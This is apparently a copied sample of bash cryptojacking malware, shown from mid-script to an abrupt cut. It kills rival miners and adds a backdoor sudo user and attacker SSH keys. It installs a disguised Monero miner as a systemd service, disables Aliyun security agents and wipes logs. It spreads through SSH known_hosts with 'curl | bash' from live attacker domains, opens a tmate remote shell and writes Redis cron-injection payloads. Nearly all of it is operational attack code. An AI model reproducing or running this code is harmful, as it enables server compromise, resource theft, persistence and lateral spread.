if [ -f /opt/server ]; then
chattr -i /opt/server 2>/dev/null 1>/dev/null
tntrecht -i /opt/server 2>/dev/null 1>/dev/null
rm -f /opt/server 2>/dev/null 1>/dev/null
pkill -f /opt/server 2>/dev/null 1>/dev/null
kill $(pidof /opt/server) 2>/dev/null 1>/dev/null
fi
if [ -f /tmp/log_rotari ]; then
chattr -i /tmp/log_rotari 2>/dev/null 1>/dev/null
tntrecht -i /tmp/log_rotari 2>/dev/null 1>/dev/null
rm -f /tmp/log_rotari 2>/dev/null 1>/dev/null
pkill -f /tmp/log_rotari 2>/dev/null 1>/dev/null
kill $(pidof /tmp/log_rotari) 2>/dev/null 1>/dev/null
fi
BASH00=$(ps ax | grep -v grep | grep "/root/.tmp00/bash")
if [ ! -z "$BASH00" ];
then
chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null
tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null
echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null
rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null
chattr -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
tntrecht -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
chmod -x /root/.tmp00/bash 2>/dev/null 1>/dev/null
pkill -f /root/.tmp00/bash 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/root/.tmp00/bash" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /root/.tmp00/bash) 2>/dev/null 1>/dev/null
echo " " > /root/.tmp00/bash 2>/dev/null 1>/dev/null
rm -f /root/.tmp00/bash 2>/dev/null 1>/dev/null
echo $StringToLock > /root/.tmp00/bash
chattr +i /root/.tmp00/bash 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp00/bash 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
BASH6400=$(ps ax | grep -v grep | grep "/root/.tmp00/bash64")
if [ ! -z "$BASH6400" ];
then
chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null
tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null
echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null
rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null
chattr -i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
tntrecht -i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
chmod -x /root/.tmp00/bash64 2>/dev/null 1>/dev/null
pkill -f /root/.tmp00/bash64 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/root/.tmp00/bash64" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /root/.tmp00/bash64) 2>/dev/null 1>/dev/null
echo " " > /root/.tmp00/bash64 2>/dev/null 1>/dev/null
rm -f /root/.tmp00/bash64 2>/dev/null 1>/dev/null
echo $StringToLock > /root/.tmp00/bash64
chattr +i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
KINSING1=$(ps ax | grep -v grep | grep "/var/tmp/kinsing")
if [ ! -z "$KINSING1" ];
then
chattr -i /var/tmp/kinsing 2>/dev/null 1>/dev/null
tntrecht -i /var/tmp/kinsing 2>/dev/null 1>/dev/null
chmod -x /var/tmp/kinsing 2>/dev/null 1>/dev/null
pkill -f /var/tmp/kinsing 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/var/tmp/kinsing" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /var/tmp/kinsing) 2>/dev/null 1>/dev/null
echo " " > /var/tmp/kinsing 2>/dev/null 1>/dev/null
rm -f /var/tmp/kinsing 2>/dev/null 1>/dev/null
echo $StringToLock > /var/tmp/kinsing
chattr +i /var/tmp/kinsing 2>/dev/null 1>/dev/null
tntrecht +i /var/tmp/kinsing 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
KINSING2=$(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi")
if [ ! -z "$KINSING2" ];
then
chattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
tntrecht -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
chmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
pkill -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/null
echo " " > /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
rm -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
echo $StringToLock > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
tntrecht +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
kill $(ps aux | grep -vw kswapd0 | grep -v grep |grep -v scan | grep -vw "/usr/bin/xmrigMiner" | grep -vw "./shell" | awk '{if($3>40.0) print $2}')
}
function makesshaxx(){
echo "begin makessh"
RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver"
grep -q hilde /etc/passwd || chattr -ia /etc/passwd;
grep -q hilde /etc/passwd || tntrecht -ia /etc/passwd;
grep -q hilde /etc/passwd || echo 'hilde:x:1000:1000::/home/hilde:/bin/bash' >> /etc/passwd; chattr +ia /etc/passwd; tntrecht +ia /etc/passwd
grep -q hilde /etc/shadow || chattr -ia /etc/shadow;
grep -q hilde /etc/shadow || tntrecht -ia /etc/shadow;
grep -q hilde /etc/shadow || echo 'hilde:$6$7n/iy4R6znS2iq0J$QjcECLSqMMiUUeHR4iJmkHLzAwgoNRhCC87HI3df95nZH5569TKwJEN2I/lNanPe0vhsdgfILPXedlWlZn7lz0:18461:0:99999:7:::' >> /etc/shadow; chattr +ia /etc/shadow; tntrecht +ia /etc/shadow
grep -q hilde /etc/sudoers || chattr -ia /etc/sudoers;
grep -q hilde /etc/sudoers || tntrecht -ia /etc/sudoers;
grep -q hilde /etc/sudoers || echo 'hilde ALL=(ALL:ALL) ALL' >> /etc/sudoers; chattr +i /etc/sudoers; tntrecht +i /etc/sudoers
mkdir /home/hilde/.ssh/ -p
touch /home/hilde/.ssh/authorized_keys
touch /home/hilde/.ssh/authorized_keys2
chmod 600 /home/hilde/.ssh/authorized_keys
chmod 600 /home/hilde/.ssh/authorized_keys2
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || chattr -ia /home/hilde/.ssh/authorized_keys;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || tntrecht -ia /home/hilde/.ssh/authorized_keys;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || echo $RSAKEY > /home/hilde/.ssh/authorized_keys; chattr +ia /home/hilde/.ssh/authorized_keys; tntrecht +ia /home/hilde/.ssh/authorized_keys;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || chattr -ia /home/hilde/.ssh/authorized_keys2;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || tntrecht -ia /home/hilde/.ssh/authorized_keys2;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || echo $RSAKEY > /home/hilde/.ssh/authorized_keys2; chattr +ia /home/hilde/.ssh/authorized_keys2; tntrecht +ia /home/hilde/.ssh/authorized_keys2;
mkdir /root/.ssh/ -p
touch /root/.ssh/authorized_keys
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys2
grep -q root@puppetserver /root/.ssh/authorized_keys || chattr -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; chattr +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys
grep -q root@puppetserver /root/.ssh/authorized_keys2 || chattr -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; chattr +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2
}
function CreateSshPunker(){
if [ ! -f "/usr/bin/pu"]
then
echo 'Iy (此处省略15607个字符...) go=' | base64 -d > /usr/bin/pu; chmod +x /usr/bin/pu
fi
}
function checksshkeys(){
if [ -f /var/tmp/.copydie/[kswapd0].log ]; then
curl http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
else
curl http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
fi
cat /home/hilde/.ssh/authorized_keys|grep root@puppetserver >/dev/null
if (test $? -ne 0); then
curl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
else
curl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
fi
cat /root/.ssh/authorized_keys|grep root@puppetserver >/dev/null
if (test $? -ne 0); then
curl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
else
curl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
fi
}
function SetupMoneroOcean(){
function SetupMoneroOcean1(){
# printing intentions
echo "[*] Downloading MoneroOcean advanced version of xmrig to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar "$MOxmrigMOD" -o /tmp/xmrig.tar.gz; then
echo "ERROR: Can't download $MOxmrigMOD file to /tmp/xmrig.tar.gz"
fi
echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
[ -d $MOHOME/ ] || mkdir $MOHOME/
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/; then
echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
fi
chmod +x $MOHOME/\[kswapd0\]
rm /tmp/xmrig.tar.gz
echo "[*] Checking if advanced version of $MOHOME/xmrig works fine (and not removed by antivirus software)"
$MOHOME/[kswapd0] --help >/dev/null
if (test $? -ne 0); then
if [ -f $MOHOME/[kswapd0] ]; then
echo "WARNING: Advanced version of $MOHOME/xmrig is not functional"
else
echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
fi
echo "[*] Looking for the latest version of Monero miner"
#LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest | grep -o '".*"' | sed 's/"//g'`
LATEST_XMRIG_LINUX_RELEASE=$MOxmrigSTOCK
echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then
echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
fi
echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/ --strip=1; then
echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
fi
rm /tmp/xmrig.tar.gz
chmod +x $MOHOME/\[kswapd0\]
echo "[*] Checking if stock version is OKAY!"
$MOHOME/[kswapd0] --help >/dev/null
if (test $? -ne 0); then
if [ -f $MOHOME/[kswapd0] ]; then
echo "ERROR: Stock version of $MOHOME/[kswapd0] is not functional too"
else
echo "ERROR: Stock version of $MOHOME/[kswapd0] was removed by antivirus too"
fi
echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
fi
fi
echo "[*] $MOHOME/[kswapd0] is OK"
}
######################### printing greetings ###########################
clear
echo -e " "
echo -e " \e[1;34;49m___________ _____________________________\033[0m"
echo -e " \e[1;34;49m\__ ___/___ _____ ____\__ ___/\ \__ ___/\033[0m"
echo -e " \e[1;34;49m | |_/ __ \\__ \ / \| | / | \| | \033[0m"
echo -e " \e[1;34;49m | |\ ___/ / __ \| Y Y \ | / | \ | \033[0m"
echo -e " \e[1;34;49m |____| \___ >____ /__|_| /____| \____|__ /____| \033[0m"
echo -e " \e[1;34;49m \/ \/ \/ \/ \033[0m"
echo -e " "
echo -e " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "
echo -e " "
echo -e " \e[1;34;49m Now you get, what i want to give... --- ''' \033[0m"
echo " "
echo " "
if [ "$(id -u)" == "0" ]; then
echo "running as root... its all OKAY!"
else
echo "running not as root... first starting tmp setup..."
fi
# checking prerequisites
if [ -z $WALLET ]; then
echo "ERROR: wallet"
fi
WALLET_BASE=`echo $WALLET | cut -f1 -d"."`
if [ ${#WALLET_BASE} != 95 ]; then
echo "ERROR: Wrong wallet base address length (should be 95): ${#WALLET_BASE}"
fi
if [ -z $MOHOME ]; then
echo "ERROR: Please define HOME environment variable to your home directory"
fi
if [ ! -d $MOHOME ]; then
echo "ERROR: Please make sure HOME directory $MOHOME exists or set it yourself using this command:"
echo ' export HOME=<dir>'
fi
if ! type curl >/dev/null; then
apt-get update --fix-missing 2>/dev/null 1>/dev/null
apt-get install -y curl 2>/dev/null 1>/dev/null
apt-get install -y --reinstall curl 2>/dev/null 1>/dev/null
yum clean all 2>/dev/null 1>/dev/null
yum install -y curl 2>/dev/null 1>/dev/null
yum reinstall -y curl 2>/dev/null 1>/dev/null
fi
sleep 2
$MOHOME/[kswapd0] --help >/dev/null
if (test $? -ne 0); then
SetupMoneroOcean1
else
echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
fi
if [ -f "$MOHOME/[kswapd0].pid" ]
then
echo "config file exists, neednot backup"
else
echo "config file not exists.download from teamtnt"
SetupMoneroOcean1
fi
if [ -f "$MOHOME/[kswapd0]" ]
then
echo "miner file exists"
else
curl -L --progress-bar $miner_url -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && mv $MOHOME/xmrig*/xmrig $MOHOME/\[kswapd0\]
fi
if [ -f "$MOHOME/[kswapd0].pid" ]
then
echo "miner config exists"
else
curl -L --progress-bar $config_url -o $MOHOME/\[kswapd0\].pid
fi
rm /tmp/xmrig.tar.gz
if [ -f "$MOHOME/[kswapd0]" ]
then
echo "miner file exists, neednot backup"
else
curl -L --progress-bar $miner_url_backup -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && chmod +x $MOHOME/\[kswapd0\]
fi
rm /tmp/cf.tar
sed -i '0,/url/{s/"url": *"[^"]*",/"url": "elastic.zzhreceive.top:1414",/}' $MOHOME/[kswapd0].pid
sed -i ':a;N;$!ba;s/"url": *"[^"]*",/"url": "oracle.zzhreceive.top:1414",/2' $MOHOME/[kswapd0].pid
sed -i 's/"coin": *[^"]*,/"coin": "monero",/' $MOHOME/[kswapd0].pid
sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 50,/' $MOHOME/[kswapd0].pid
sed -i 's#"log-file": *null,#"log-file": "'$MOHOME/[kswapd0].log'",#' $MOHOME/[kswapd0].pid
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $MOHOME/[kswapd0].pid
cp $MOHOME/[kswapd0].pid $MOHOME/config_background.json
sed -i 's/"background": *false,/"background": true,/' $MOHOME/config_background.json
# preparing script
echo "[*] Creating $MOHOME/[kswapd0].sh script"
cat >$MOHOME/[kswapd0].sh <<EOL
#!/bin/bash
if ! pidof [kswapd0] >/dev/null; then
nice $MOHOME/[kswapd0] \$*
else
echo "Monero miner is already running in the background. Refusing to run another one."
echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."
fi
EOL
chmod +x $MOHOME/[kswapd0].sh
# preparing script background work and work under reboot
if ! sudo -n true 2>/dev/null; then
if ! grep $MOHOME/[kswapd0].sh /root/.profile >/dev/null; then
echo "[*] Adding $MOHOME/[kswapd0].sh script to /root/.profile"
echo "$MOHOME/[kswapd0].sh --config=$MOHOME/config_background.json >/dev/null 2>&1" >>/root/.profile
else
echo "Looks like $MOHOME/[kswapd0].sh script is already in the /root/.profile"
fi
echo "[*] Running kswapd0 service in the background (see logs in $MOHOME/[kswapd0].log file)"
/bin/bash $MOHOME/[kswapd0].sh --config=$MOHOME/config_background.json >/dev/null 2>&1
else
if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
echo "[*] Enabling huge pages"
echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
fi
if ! type systemctl >/dev/null; then
/bin/bash $MOHOME/[kswapd0].sh --config=$MOHOME/config_background.json >/dev/null 2>&1
else
echo "[*] Creating kswapd0 systemd service"
chmod +x /usr/bin/systemctl
cat >/tmp/kswapd0.service <<EOL
[Unit]
Description=kswapd0 system service
[Service]
ExecStart=$MOHOME/[kswapd0] --config=$MOHOME/[kswapd0].pid
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL
sudo mv /tmp/kswapd0.service /etc/systemd/system/kswapd0.service
echo "[*] Starting kswapd0 systemd service"
sudo killall [kswapd0] 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable kswapd0.service
sudo systemctl start kswapd0.service
fi
fi
}
localgo() {
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o- http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done
fi
}
clmo() {
if ps aux | grep -i '[a]liyun'; then
echo "this is ali cloud"
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
until [ "$number" -eq 0 ]; do
systemctl stop aliyun
systemctl stop aegis
ps -ef|grep -i aegis|awk '{print $2}'|xargs kill -HUP
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
done
while [ -d /usr/local/aegis ]
do
ps -ef|grep -i AliSecGuard|grep -v grep |awk '{print $2}'|xargs kill -HUP
path=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}')
num=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}'|wc -l)
if [ $num -gt 0 ]
then
echo "$path" exist
$path --stopdriver
else
echo "no AliSecGuard process"
fi
rm -rf /usr/local/aegis
done
else
echo "it's not ali cloud"
fi
}
tmt() {
mkdir -p /var/tmp/ 2>/dev/null
chattr -ia / /var/ /var/tmp/ 2>/dev/null
pkill tmate 2>/dev/null
if [ ! -f "/tmp/tmate" ]; then wget http://bbq.zzhreceive.top/tmate -O /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then curl http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then cd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then wd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
chmod +x /tmp/tmate
URLTOKEN=$(awk 'BEGIN{srand();print rand()*1000000}')"O"$RANDOM
/tmp/tmate -F -k tmk-4ST6GRXU6GPUjlXHfSlNe0ZaT2 -n $URLTOKEN >/tmp/.tmbd &
curl http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wget http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
cd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
}
KILLMININGSERVICES
clmo
SetupMoneroOcean
makesshaxx
checksshkeys
back
hid
SecureTheSystem
FixTheSystem
if [ ! -f "/var/tmp/.alsp" ]; then
localgo
echo 'lockfile' > /var/tmp/.alsp
tntrecht +i /var/tmp/.alsp || chattr +i /var/tmp/.alsp
else
echo "replay .. i know this server ..."
exit
fi
echo ""
echo "[*] Setup complete"
curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
cd1 -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
history -c
## now the bad part of the script###
cronscan_sh
##### 下载来源:h*t*t*p://107.189.3.150/b2f628/cronscan.sh #####
#/bin/bash
if [ -f /bin/cd1 ];then
aabb=/bin/cd1
echo "cd1 exist"
elif [ -f /bin/curl ];then
aabb=/bin/curl
echo "curl exist"
elif [ -f /usr/bin/curl ];then
aabb=/usr/bin/curl
echo "curl exist"
elif [ -f /usr/bin/cd1 ];then
aabb=/usr/bin/cd1
echo "cd1 exist"
else
echo "curl not exist,use yum reinstall"
yum -y remove curl&&yum -y install curl
fi
if [ -f /bin/wd1 ];then
ccdd=/bin/wd1
echo "wd1 exist"
elif [ -f /bin/wget ];then
ccdd=/bin/wget
echo "wget exist"
else
echo "wget not exist,use yum reinstall"
yum -y remove wget&&yum -y install wget
fi
if ! type systemctl >/dev/null; then
$aabb -fsSL http://oracle.zzhreceive.top/b2f628/rss.sh | bash
else
echo "[*] Creating scan systemd service"
$aabb -fsSL http://oracle.zzhreceive.top/b2f628/cronrs.sh -o /usr/share/\[scan\] && chmod 744 /usr/share/\[scan\]
cat >/tmp/scan.service <<EOL
[Service]
ExecStart=/usr/share/[scan]
Restart=always
[Install]
WantedBy=default.target
EOL
sudo mv /tmp/scan.service /etc/systemd/system/scan.service
echo "[*] Starting scan systemd service"
sudo killall [scan] 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable scan.service
sudo systemctl start scan.service
fi
if ! type systemctl >/dev/null; then
$aabb -fsSL http://oracle.zzhreceive.top/b2f628/c.sh | bash
else
echo "[*] Creating mass systemd service"
$aabb -fsSL http://oracle.zzhreceive.top/b2f628/c.sh -o /usr/share/\[mass\] && chmod 744 /usr/share/\[mass\]
cat >/tmp/mass.service <<EOL
[Service]
ExecStart=/usr/share/[mass]
Restart=always
[Install]
WantedBy=default.target
EOL
sudo mv /tmp/mass.service /etc/systemd/system/mass.service
echo "[*] Starting mass systemd service"
sudo killall [mass] 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable mass.service
sudo systemctl start mass.service
fi
$aabb -fsSL http://oracle.zzhreceive.top/service/tmate.sh -o /usr/share/\[mate\] && chmod 744 /usr/share/\[mate\]
cat >/tmp/mate.service <<EOL
[Service]
ExecStart=/usr/share/[mate]
Restart=always
[Install]
WantedBy=default.target
EOL
sudo mv /tmp/mate.service /etc/systemd/system/mate.service
echo "[*] Starting mate systemd service"
sudo killall [mate] 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable mate.service
sudo systemctl start mate.service
fi
cronsh_sh
##### 下载来源:h*t*t*p://107.189.3.150/b2f628/cronsh.sh #####
#!/bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
function SecureTheSystem(){
SYSFILEARRAY=(pstree kill pkill htop netstat ss lsof wget wge wdl curl cur cdl sysctl )
for SYSFILE in ${SYSFILEARRAY[@]}; do
SYSFILEBIN=`which $SYSFILE` 2>/dev/null 1>/dev/null
tntrecht -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chmod -x $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr +i $SYSFILEBIN 2>/dev/null 1>/dev/null
tntrecht +i $SYSFILEBIN 2>/dev/null 1>/dev/null
done
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht +i -R $SYSTEMFILE 2>/dev/null 1>/dev/null
chattr +i -R $SYSTEMFILE 2>/dev/null 1>/dev/null
done
}
sleep 1
if [ -f "/bin/ps.original" ]
then
ps.original -fe|grep pnscan |grep -v grep
else
ps -fe|grep pnscan |grep -v grep
fi
if [ $? -ne 0 ]
then
rm -rf .dat .shard .ranges .lan 2>/dev/null
sleep 1
echo 'config set dbfilename "backup.db"' > .dat
echo 'save' >> .dat
echo 'config set stop-writes-on-bgsave-error no' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
